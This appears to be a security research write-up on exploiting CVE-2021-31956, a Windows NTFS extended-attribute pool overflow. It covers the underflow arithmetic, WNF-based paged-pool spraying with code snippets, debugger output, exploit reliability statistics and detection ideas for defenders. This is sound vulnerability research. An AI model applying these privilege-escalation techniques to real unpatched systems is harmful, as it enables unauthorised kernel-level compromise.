Failed after 32 – How many times the exploit failed to overflow an adjacent object of the required target type, by reaching the max number of overflow attempts. 32 was chosen a semi-arbitrary value based on empirical testing and the blocks in the BlockBitmap for the LFH being scanned by groups of 32 blocks.

BSODs on exec – Number of times the exploit BSOD the box on execution.

Unmapped Read – Number of times the relative read reaches unmapped memory (ExpWnfReadStateData) – included in the BSOD on exec count above.

Spray Size Variation

The following statistics show runs when varying the spray size.

Spray size 3000

Result Run 1 Run 2 Run 3 Run 4 Run 5 Avg
SYSTEM shells 85 82 76 75 75 78
Total LFH writes 708 726 707 678 624 688
Avg LFH writes 8 8 9 9 8 8
Failed after 32 1 3 2 1 1 2
BSODs on exec 14 15 22 24 24 20
Unmapped Read 4 5 8 6 10 7

Spray size 6000

Result Run 1 Run 2 Run 3 Run 4 Run 5 Avg
SYSTEM shells 84 80 78 84 79 81
Total LFH writes 674 643 696 762 706 696
Avg LFH writes 8 8 9 9 8 8
Failed after 32 2 4 3 3 4 3
BSODs on exec 14 16 19 13 17 16
Unmapped Read 2 4 4 5 4 4

Spray size 10000

Result Run 1 Run 2 Run 3 Run 4 Run 5 Avg
SYSTEM shells 84 85 87 85 86 85
Total LFH writes 805 714 761 688 694 732
Avg LFG writes 9 8 8 8 8 8
Failed after 32 3 5 3 3 3 3
BSODs on exec 13 10 10 12 11 11
Unmapped Read 1 0 1 1 0 1

Spray size 20000

Result Run 1 Run 2 Run 3 Run 4 Run 5 Avg
SYSTEM shells 89 90 94 90 90 91
Total LFH writes 624 763 657 762 650 691
Avg LFG writes 7 8 7 8 7 7
Failed after 32 3 2 1 2 2 2
BSODs on exec 8 8 5 8 8 7
Unmapped Read 0 0 0 0 1 0

From this was can see that increasing the spray size leads to a much decreased chance of hitting an unmapped read (due to the page not being mapped) and thus reducing the number of BSODs.

On average, the number of overflows needed to obtain the correct memory layout stayed roughly the same regardless of spray size.

Post Exploitation Method Variation

I also experimented with the post exploitation method used (token stealing vs modifying the existing token). The reason for this is that performing the token stealing method there are more kernel reads/writes and a longer time duration between reverting PreviousMode.

20000 spray size

With all the _SEP_TOKEN_PRIVILEGES enabled:

Result Run 1 Run 2 Run 3 Run 4 Run 5 Avg
PRIV shells 94 92 93 92 89 92
Total LFH writes 939 825 825 788 724 820
Avg LFG writes 9 8 8 8 8 8
Failed after 32 2 2 1 2 0 1
BSODs on exec 4 6 6 6 11 6
Unmapped Read 0 1 1 2 2 1

Therefore, there is only negligible difference these two methods.

Detection

After all of this is there anything we have learned which could help defenders?

Well firstly there is a patch out for this vulnerability since the 8th of June 2021. If your reading this and the patch is not applied, then there are obviously bigger problems with the patch management lifecycle to focus on 🙂

However, there are some engineering insights which can be gained from this and in general detecting memory corruption exploits within the wild. I will focus specifically on the vulnerability itself and this exploit, rather than the more generic post exploitation technique detection (token stealing etc) which have been covered in many online articles. As I never had access to the in the wild exploit, these detection mechanisms may not be useful for that scenario. Regardless, this research should allow security researchers a greater understanding in this area.

The main artifacts from this exploit are:

  • NTFS Extended Attributes being created and queried.
  • WNF objects being created (as part of the spray)
  • Failed exploit attempts leading to BSODs

NTFS Extended Attributes

Firstly, examining the ETW framework for Windows, the provider Microsoft-Windows-Kernel-File was found to expose "SetEa" and "QueryEa" events.

This can be captured as part of an ETW trace:

As this vulnerability can be exploited a low integrity (and thus from a sandbox), then the detection mechanisms would vary based on if an attacker had local code execution or chained it together with a browser exploit.

One idea for endpoint detection and response (EDR) based detection would be that a browser render process executing both of these actions (in the case of using this exploit to break out of a browser sandbox) would warrant deeper investigation. For example, whilst loading a new tab and web page, the browser process "MicrosoftEdge.exe" triggers these events legitimately under normal operation, whereas the sandboxed renderer process "MicrosoftEdgeCP.exe" does not. Chrome while loading a new tab and web page did not trigger either of the events too. I didn’t explore too deeply if there were any render operations which could trigger this non-maliciously but provides a place where defenders can explore further.

WNF Operations

The second area investigated was to determine if there were any ETW events produced by WNF based operations. Looking through the "Microsoft-Windows-Kernel-*" providers I could not find any related events which would help in this area. Therefore, detecting the spray through any ETW logging of WNF operations did not seem feasible. This was expected due to the WNF subsystem not being intended for use by non-MS code.

Crash Dump Telemetry

Crash Dumps are a very good way to detect unreliable exploitation techniques or if an exploit developer has inadvertently left their development system connected to a network. MS08-067 is a well known example of Microsoft using this to identify an 0day from their WER telemetry. This was found by looking for shellcode, however, certain crashes are pretty suspicious when coming from production releases. Apple also seem to have added telemetry to iMessage for suspicious crashes too.

In the case of this specific vulnerability when being exploited with WNF, there is a slim chance (approx. <5%) that the following BSOD can occur which could act a detection artefact:

```
Child-SP          RetAddr           Call Site
ffff880f`6b3b7d18 fffff802`1e112082 nt!DbgBreakPointWithStatus
ffff880f`6b3b7d20 fffff802`1e111666 nt!KiBugCheckDebugBreak+0x12
ffff880f`6b3b7d80 fffff802`1dff3fa7 nt!KeBugCheck2+0x946
ffff880f`6b3b8490 fffff802`1e0869d9 nt!KeBugCheckEx+0x107
ffff880f`6b3b84d0 fffff802`1deeeb80 nt!MiSystemFault+0x13fda9
ffff880f`6b3b85d0 fffff802`1e00205e nt!MmAccessFault+0x400
ffff880f`6b3b8770 fffff802`1e006ec0 nt!KiPageFault+0x35e
ffff880f`6b3b8908 fffff802`1e218528 nt!memcpy+0x100
ffff880f`6b3b8910 fffff802`1e217a97 nt!ExpWnfReadStateData+0xa4
ffff880f`6b3b8980 fffff802`1e0058b5 nt!NtQueryWnfStateData+0x2d7
ffff880f`6b3b8a90 00007ffe`e828ea14 nt!KiSystemServiceCopyEnd+0x25
00000082`054ff968 00007ff6`e0322948 0x00007ffe`e828ea14
00000082`054ff970 0000019a`d26b2190 0x00007ff6`e0322948
00000082`054ff978 00000082`054fe94e 0x0000019a`d26b2190
00000082`054ff980 00000000`00000095 0x00000082`054fe94e
00000082`054ff988 00000000`000000a0 0x95
00000082`054ff990 0000019a`d26b71e0 0xa0
00000082`054ff998 00000082`054ff9b4 0x0000019a`d26b71e0
00000082`054ff9a0 00000000`00000000 0x00000082`054ff9b4
```

Under normal operation you would not expect a memcpy operation to fault accessing unmapped memory when triggered by the WNF subsystem. Whilst this telemetry might lead to attack attempts being discovered prior to an attacker obtaining code execution. Once kernel code execution has been gained or SYSTEM, they may just disable the telemetry or sanitise it afterwards – especially in cases where there could be system instability post exploitation. Windows 11 looks to have added additional ETW logging with these policy settings to determine scenarios when this is modified:

Windows 11 ETW events.

Conclusion

This article demonstrates some of the further lengths an exploit developer needs to go to achieve more reliable and stable code execution beyond a simple POC.

At this point we now have an exploit which is much more succesful and less likely to cause instability on the target system than a simple POC. However, we can only get about 90%~ success rate due to the techniques used. This seems to be about the limit with this approach and without using alternative exploit primitives. The article also gives some examples of potential ways to identify exploitation of this vulnerability and detection of memory corruption exploits in general.

Acknowledgements

Boris Larin, for discovering this 0day being exploited within the wild and the initial write-up.

Yan ZiShuang, for performing parallel research into exploitation of this vuln and blogging about it.

Alex Ionescu and Gabrielle Viala for the initial documentation of WNF.

Corentin Bayet, Paul Fariello, Yarden Shafir, Angelboy, Mark Yason for publishing their research into the Windows 10 Segment Pool/Heap.

Aaron Adams and Cedric Halbronn for doing multiple QA’s and discussions around this research.

CVE-2021-31956 Exploiting the Windows Kernel (NTFS with WNF) – Part 1

Introduction

Recently I decided to take a look at CVE-2021-31956, a local privilege escalation within Windows due to a kernel memory corruption bug which was patched within the June 2021 Patch Tuesday.

Microsoft describe the vulnerability within their advisory document, which notes many versions of Windows being affected and in-the-wild exploitation of the issue being used in targeted attacks. The exploit was found in the wild by https://twitter.com/oct0xor of Kaspersky.

Kaspersky produced a nice summary of the vulnerability and describe briefly how the bug was exploited in the wild.

As I did not have access to the exploit (unlike Kaspersky?), I attempted to exploit this vulnerability on Windows 10 20H2 to determine the ease of exploitation and to understand the challenges attackers face when writing a modern kernel pool exploits for Windows 10 20H2 and onwards.

One thing that stood out to me was the mention of the Windows Notification Framework (WNF) used by the in-the-wild attackers to enable novel exploit primitives. This lead to further investigation into how this could be used to aid exploitation in general. The findings I present below are obviously speculation based on likely uses of WNF by an attacker. I look forward to seeing the Kaspersky write-up to determine if my assumptions on how this feature could be leveraged are correct!

This blog post is the first in the series and will describe the vulnerability, the initial constraints from an exploit development perspective and finally how WNF can be abused to obtain a number of exploit primitives. The blogs will also cover exploit mitigation challenges encountered along the way, which make writing modern pool exploits more difficult on the most recent versions of Windows.

Future blog posts will describe improvements which can be made to an exploit to enhance reliability, stability and clean-up afterwards.

Vulnerability Summary

As there was already a nice summary produced by Kaspersky it was trivial to locate the vulnerable code inside the ntfs.sys driver’s NtfsQueryEaUserEaList function:

The backing structure in this case is _FILE_FULL_EA_INFORMATION.

Basically the code above loops through each NTFS extended attribute (Ea) for a file and copies from the Ea Block into the output buffer based on the size of ea_block->EaValueLength + ea_block->EaNameLength + 9.

There is a check to ensure that the ea_block_size is less than or equal to out_buf_length - padding.

The out_buf_length is then decremented by the size of the ea_block_size and its padding.

The padding is calculated by ((ea_block_size + 3) & 0xFFFFFFFC) - ea_block_size;

This is because each Ea Block should be padded to be 32-bit aligned.

Putting some example numbers into this, lets assume the following: There are two extended attributes within the extended attributes for the file.

At the first iteration of the loop we could have the following values:

EaNameLength = 5
EaValueLength = 4

ea_block_size = 9 + 5 + 4 = 18
padding = 0

So assuming that 18 < out_buf_length - 0, data would be copied into the buffer. We will use 30 for this example.

out_buf_length = 30 - 18 + 0
out_buf_length = 12 // we would have 12 bytes left of the output buffer.

padding = ((18+3) & 0xFFFFFFFC) - 18
padding = 2

We could then have a second extended attribute in the file with the same values :

EaNameLength = 5
EaValueLength = 4

ea_block_size = 9 + 5 + 4 = 18

At this point padding is 2, so the calculation is:

18 <= 12 - 2 // is False.

Therefore, the second memory copy would correctly not occur due to the buffer being too small.

However, consider the scenario when we have the following setup if we could have the out_buf_length of 18.

First extended attribute:

EaNameLength = 5
EaValueLength = 4

Second extended attribute:

EaNameLength = 5
EaValueLength = 47

First iteration the loop:

EaNameLength = 5
EaValueLength = 4

ea_block_size = 9 + 5 + 4 // 18
padding = 0

The resulting check is:

18 <= 18 - 0 // is True and a copy of 18 occurs.
out_buf_length = 18 - 18 + 0 
out_buf_length = 0 // We would have 0 bytes left of the output buffer.

padding = ((18+3) & 0xFFFFFFFC) - 18
padding = 2

Our second extended attribute with the following values:

EaNameLength = 5
EaValueLength = 47

ea_block_size = 5 + 47 + 9
ea_block_size = 137

In the resulting check will be:

ea_block_size <= out_buf_length - padding

137 <= 0 - 2

And at this point we have underflowed the check and 137 bytes will be copied off the end of the buffer, corrupting the adjacent memory.

Looking at the caller of this function NtfsCommonQueryEa, we can see the output buffer is allocated on the paged pool based on the size requested:

By looking at the callers for NtfsCommonQueryEa we can see that we can see that NtQueryEaFile system call path triggers this code path to reach the vulnerable code.

The documentation for the Zw version of this syscall function is here.

We can see that the output buffer Buffer is passed in from userspace, together with the Length of this buffer. This means we end up with a controlled size allocation in the kernel space based on the size of the buffer. However, to trigger this vulnerability, we need to trigger an underflow as described as above.

In order to do trigger the underflow, we need to set our output buffer size to be length of the first Ea Block.

Providing we are padding the allocation, the second Ea Block will be written out of bounds of the buffer when the second Ea Block is queried.

The interesting things from this vulnerability from an attacker perspective are:

1) The attacker can control the data which is used within the overflow and the size of the overflow. Extended attribute values do not constrain the values which they can contain.
2) The overflow is linear and will corrupt any adjacent pool chunks.
3) The attacker has control over the size of the pool chunk allocated.

However, the question is can this be exploited reliably in the presence of modern kernel pool mitigations and is this a “good” memory corruption:

What makes a good memory corruption.

Triggering the corruption

So how do we construct a file containing NTFS extended attributes which will lead to the vulnerability being triggered when NtQueryEaFile is called?

The function NtSetEaFile has the Zw version documented here.

The Buffer parameter here is “a pointer to a caller-supplied, FILE_FULL_EA_INFORMATION-structured input buffer that contains the extended attribute values to be set”.

Therefore, using the values above, the first extended attribute occupies the space within the buffer between 0-18.

There is then the padding length of 2, with the second extended attribute starting at 20 offset.

typedef struct _FILE_FULL_EA_INFORMATION {
  ULONG  NextEntryOffset;
  UCHAR  Flags;
  UCHAR  EaNameLength;
  USHORT EaValueLength;
  CHAR   EaName[1];
} FILE_FULL_EA_INFORMATION, *PFILE_FULL_EA_INFORMATION;

The key thing here is that NextEntryOffset of the first EA block is set to the offset of the overflowing EA including the padding position (20). Then for the overflowing EA block the NextEntryOffset is set to 0 to end the chain of extended attributes being set.

This means constructing two extended attributes, where the first extended attribute block is the size in which we want to allocate our vulnerable buffer (minus the pool header). The second extended attribute block is set to the overflow data.

If we set our first extended attribute block to be exactly the size of the Length parameter passed in NtQueryEaFile then, provided there is padding, the check will be underflowed and the second extended attribute block will allow copy of an attacker-controlled size.

So in summary, once the extended attributes have been written to the file using NtSetEaFile. It is then necessary to trigger the vulnerable code path to act on them by setting the outbuffer size to be exactly the same size as our first extended attribute using NtQueryEaFile.

Understanding the kernel pool layout on Windows 10

The next thing we need to understand is how kernel pool memory works. There is plenty of older material on kernel pool exploitation on older versions of Windows, however, not very much on recent versions of Windows 10 (19H1 and up). There has been significant changes with bringing userland Segment Heap concepts to the Windows kernel pool. I highly recommend reading Scoop the Windows 10 Pool! by Corentin Bayet and Paul Fariello from Synacktiv for a brilliant paper on this and proposing some initial techniques. Without this paper being published already, exploitation of this issue would have been significantly harder.

Firstly the important thing to understand is to determine where in memory the vulnerable pool chunk is allocated and what the surrounding memory looks like. We determine what heap structure in which the chunk lives on from the four “backends”:

  • Low Fragmentation Heap (LFH)
  • Variable Size Heap (VS)
  • Segment Allocation
  • Large Alloc

I started off using the NtQueryEaFile parameter Length value above of 0x12 to end up with a vulnerable chunk of sized 0x30 allocated on the LFH as follows:

Pool page ffff9a069986f3b0 region is Paged pool
 ffff9a069986f010 size:   30 previous size:    0  (Allocated)  Ntf0
 ffff9a069986f040 size:   30 previous size:    0  (Free)       ....
 ffff9a069986f070 size:   30 previous size:    0  (Free)       ....
 ffff9a069986f0a0 size:   30 previous size:    0  (Free)       CMNb
 ffff9a069986f0d0 size:   30 previous size:    0  (Free)       CMNb
 ffff9a069986f100 size:   30 previous size:    0  (Allocated)  Luaf
 ffff9a069986f130 size:   30 previous size:    0  (Free)       SeSd
 ffff9a069986f160 size:   30 previous size:    0  (Free)       SeSd
 ffff9a069986f190 size:   30 previous size:    0  (Allocated)  Ntf0
 ffff9a069986f1c0 size:   30 previous size:    0  (Free)       SeSd
 ffff9a069986f1f0 size:   30 previous size:    0  (Free)       CMNb
 ffff9a069986f220 size:   30 previous size:    0  (Free)       CMNb
 ffff9a069986f250 size:   30 previous size:    0  (Allocated)  Ntf0
 ffff9a069986f280 size:   30 previous size:    0  (Free)       SeGa
 ffff9a069986f2b0 size:   30 previous size:    0  (Free)       Ntf0
 ffff9a069986f2e0 size:   30 previous size:    0  (Free)       CMNb
 ffff9a069986f310 size:   30 previous size:    0  (Allocated)  Ntf0
 ffff9a069986f340 size:   30 previous size:    0  (Free)       SeSd
 ffff9a069986f370 size:   30 previous size:    0  (Free)       APpt
*ffff9a069986f3a0 size:   30 previous size:    0  (Allocated) *NtFE
    Pooltag NtFE : Ea.c, Binary : ntfs.sys
 ffff9a069986f3d0 size:   30 previous size:    0  (Allocated)  Ntf0
 ffff9a069986f400 size:   30 previous size:    0  (Free)       SeSd
 ffff9a069986f430 size:   30 previous size:    0  (Free)       CMNb
 ffff9a069986f460 size:   30 previous size:    0  (Free)       SeUs
 ffff9a069986f490 size:   30 previous size:    0  (Free)       SeGa

This is due to the size of the allocation fitting being below 0x200.

We can step through the corruption of the adjacent chunk occurring by settings a conditional breakpoint on the following location:

bp Ntfs!NtfsQueryEaUserEaList "j @r12 != 0x180 & @r12 != 0x10c & @r12 != 0x40 '';'gc'" then breakpointing on the memcpy location.

This example ignores some common sizes which are often hit on 20H2, as this code path is used by the system often under normal operation.

It should be mentioned that I initially missed the fact that the attacker has good control over the size of the pool chunk initially and therefore went down the path of constraining myself to an expected chunk size of 0x30. This constraint was not actually true, however, demonstrates that even with more restricted attacker constraints these can often be worked around and that you should always try to understand the constraints of your bug fully before jumping into exploitation 🙂

By analyzing the vulnerable NtFE allocation, we can see we have the following memory layout:

!pool @r9
*ffff8001668c4d80 size:   30 previous size:    0  (Allocated) *NtFE
    Pooltag NtFE : Ea.c, Binary : ntfs.sys
 ffff8001668c4db0 size:   30 previous size:    0  (Free)       C...

1: kd> dt !_POOL_HEADER ffff8001668c4d80
nt!_POOL_HEADER
   +0x000 PreviousSize     : 0y00000000 (0)
   +0x000 PoolIndex        : 0y00000000 (0)
   +0x002 BlockSize        : 0y00000011 (0x3)
   +0x002 PoolType         : 0y00000011 (0x3)
   +0x000 Ulong1           : 0x3030000
   +0x004 PoolTag          : 0x4546744e
   +0x008 ProcessBilled    : 0x0057005c`007d0062 _EPROCESS
   +0x008 AllocatorBackTraceIndex : 0x62
   +0x00a PoolTagHash      : 0x7d

Followed by 0x12 bytes of the data itself.

This means that chunk size calculation will be, 0x12 + 0x10 = 0x22, with this then being rounded up to the 0x30 segment chunk size.

We can however also adjust both the size of the allocation and the amount of data we will overflow.

As an alternative example, using the following values overflows from a chunk of 0x70 into the adjacent pool chunk (debug output is taken from testing code):

NtCreateFile is located at 0x773c2f20 in ntdll.dll
RtlDosPathNameToNtPathNameN is located at 0x773a1bc0 in ntdll.dll
NtSetEaFile is located at 0x773c42e0 in ntdll.dll
NtQueryEaFile is located at 0x773c3e20 in ntdll.dll
WriteEaOverflow EaBuffer1->NextEntryOffset is 96
WriteEaOverflow EaLength1 is 94
WriteEaOverflow EaLength2 is 59
WriteEaOverflow Padding is 2
WriteEaOverflow ea_total is 155
NtSetEaFileN sucess
output_buf_size is 94
GetEa2 pad is 1
GetEa2 Ea1->NextEntryOffset is 12
GetEa2 EaListLength is 31
GetEa2 out_buf_length is 94

This ends up being allocated within a 0x70 byte chunk:

ffffa48bc76c2600 size:   70 previous size:    0  (Allocated)  NtFE

As you can see it is therefore possible to influence the size of the vulnerable chunk.

At this point, we need to determine if it is possible to allocate adjacent chunks of a useful size class which can be overflowed into, to gain exploit primitives, as well as how to manipulate the paged pool to control the layout of these allocations (feng shui).

Much less has been written on Windows Paged Pool manipulation than Non-Paged pool and to our knowledge nothing at all has been publicly written about using WNF structures for exploitation primitives so far.

WNF Introduction

The Windows Notification Facitily is a notification system within Windows which implements a publisher/subscriber model for delivering notifications.

Great previous research has been performed by Alex Ionescu and Gabrielle Viala documenting how this feature works and is designed.

I don’t want to duplicate the background here, so I recommend reading the following documents first to get up to speed:

Having a good grounding in the above research will allow a better understanding of how WNF related structures used by Windows.

Controlled Paged Pool Allocation

One of the first important things for kernel pool exploitation is being able to control the state of the kernel pool to be able to obtain a memory layout desired by the attacker.

There has been plenty of previous research into non-paged pool and the session pool, however, less from a paged pool perspective. As this overflow is occurring within the paged pool, then we need to find exploit primitives allocated within this pool.

Now after some reversing of WNF, it was determined that the majority of allocations used within this feature use memory from the paged pool.

I started off by looking through the primary structures associated with this feature and what could be controlled from userland.

One of the first things which stood out to me was that the actual data used for notifications is stored after the following structure:

nt!_WNF_STATE_DATA
   +0x000 Header           : _WNF_NODE_HEADER
   +0x004 AllocatedSize    : Uint4B
   +0x008 DataSize         : Uint4B
   +0x00c ChangeStamp      : Uint4B

Which is pointed at by the WNF_NAME_INSTANCE structure’s StateData pointer:

nt!_WNF_NAME_INSTANCE
   +0x000 Header           : _WNF_NODE_HEADER
   +0x008 RunRef           : _EX_RUNDOWN_REF
   +0x010 TreeLinks        : _RTL_BALANCED_NODE
   +0x028 StateName        : _WNF_STATE_NAME_STRUCT
   +0x030 ScopeInstance    : Ptr64 _WNF_SCOPE_INSTANCE
   +0x038 StateNameInfo    : _WNF_STATE_NAME_REGISTRATION
   +0x050 StateDataLock    : _WNF_LOCK
   +0x058 StateData        : Ptr64 _WNF_STATE_DATA
   +0x060 CurrentChangeStamp : Uint4B
   +0x068 PermanentDataStore : Ptr64 Void
   +0x070 StateSubscriptionListLock : _WNF_LOCK
   +0x078 StateSubscriptionListHead : _LIST_ENTRY
   +0x088 TemporaryNameListEntry : _LIST_ENTRY
   +0x098 CreatorProcess   : Ptr64 _EPROCESS
   +0x0a0 DataSubscribersCount : Int4B
   +0x0a4 CurrentDeliveryCount : Int4B

Looking at the function NtUpdateWnfStateData we can see that this can be used for controlled size allocations within the paged pool, and can be used to store arbitrary data.

The following allocation occurs within ExpWnfWriteStateData, which is called from NtUpdateWnfStateData:

v19 = ExAllocatePoolWithQuotaTag((POOL_TYPE)9, (unsigned int)(v6 + 16), 0x20666E57u);

Looking at the prototype of the function:

We can see that the argument Length is our v6 value 16 (the 0x10-byte header prepended).

Therefore, we have (0x10-bytes of _POOL_HEADER) header as follows:

1: kd> dt _POOL_HEADER
nt!_POOL_HEADER
   +0x000 PreviousSize     : Pos 0, 8 Bits
   +0x000 PoolIndex        : Pos 8, 8 Bits
   +0x002 BlockSize        : Pos 0, 8 Bits
   +0x002 PoolType         : Pos 8, 8 Bits
   +0x000 Ulong1           : Uint4B
   +0x004 PoolTag          : Uint4B
   +0x008 ProcessBilled    : Ptr64 _EPROCESS
   +0x008 AllocatorBackTraceIndex : Uint2B
   +0x00a PoolTagHash      : Uint2B

followed by the _WNF_STATE_DATA of size 0x10:

nt!_WNF_STATE_DATA
   +0x000 Header           : _WNF_NODE_HEADER
   +0x004 AllocatedSize    : Uint4B
   +0x008 DataSize         : Uint4B
   +0x00c ChangeStamp      : Uint4B

With the arbitrary-sized data following the structure.

To track the allocations we make using this function we can use:

nt!ExpWnfWriteStateData "j @r8 = 0x100 '';'gc'"

We can then construct an allocation method which creates a new state name and performs our allocation:

NtCreateWnfStateName(&state, WnfTemporaryStateName, WnfDataScopeMachine, FALSE, 0, 0x1000, psd);
NtUpdateWnfStateData(&state, buf, alloc_size, 0, 0, 0, 0);

Using this we can spray controlled sizes within the paged pool and fill it with controlled objects:

1: kd> !pool ffffbe0f623d7190
Pool page ffffbe0f623d7190 region is Paged pool
 ffffbe0f623d7020 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7050 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7080 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d70b0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d70e0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7110 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7140 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
*ffffbe0f623d7170 size:   30 previous size:    0  (Allocated) *Wnf  Process: ffff87056ccc0080
        Pooltag Wnf  : Windows Notification Facility, Binary : nt!wnf
 ffffbe0f623d71a0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d71d0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7200 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7230 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7260 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7290 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d72c0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d72f0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7320 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7350 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7380 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d73b0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d73e0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7410 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7440 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7470 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d74a0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d74d0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7500 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7530 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7560 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7590 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d75c0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d75f0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7620 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7650 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7680 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d76b0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d76e0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7710 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7740 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7770 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d77a0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d77d0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7800 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7830 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7860 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7890 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d78c0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d78f0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7920 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7950 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7980 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d79b0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d79e0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7a10 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7a40 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7a70 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7aa0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7ad0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7b00 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7b30 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7b60 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7b90 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7bc0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7bf0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7c20 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7c50 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7c80 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7cb0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7ce0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7d10 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7d40 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7d70 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7da0 size:   30 previous size:    0  (Allocated)  Ntf0
 ffffbe0f623d7dd0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7e00 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7e30 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
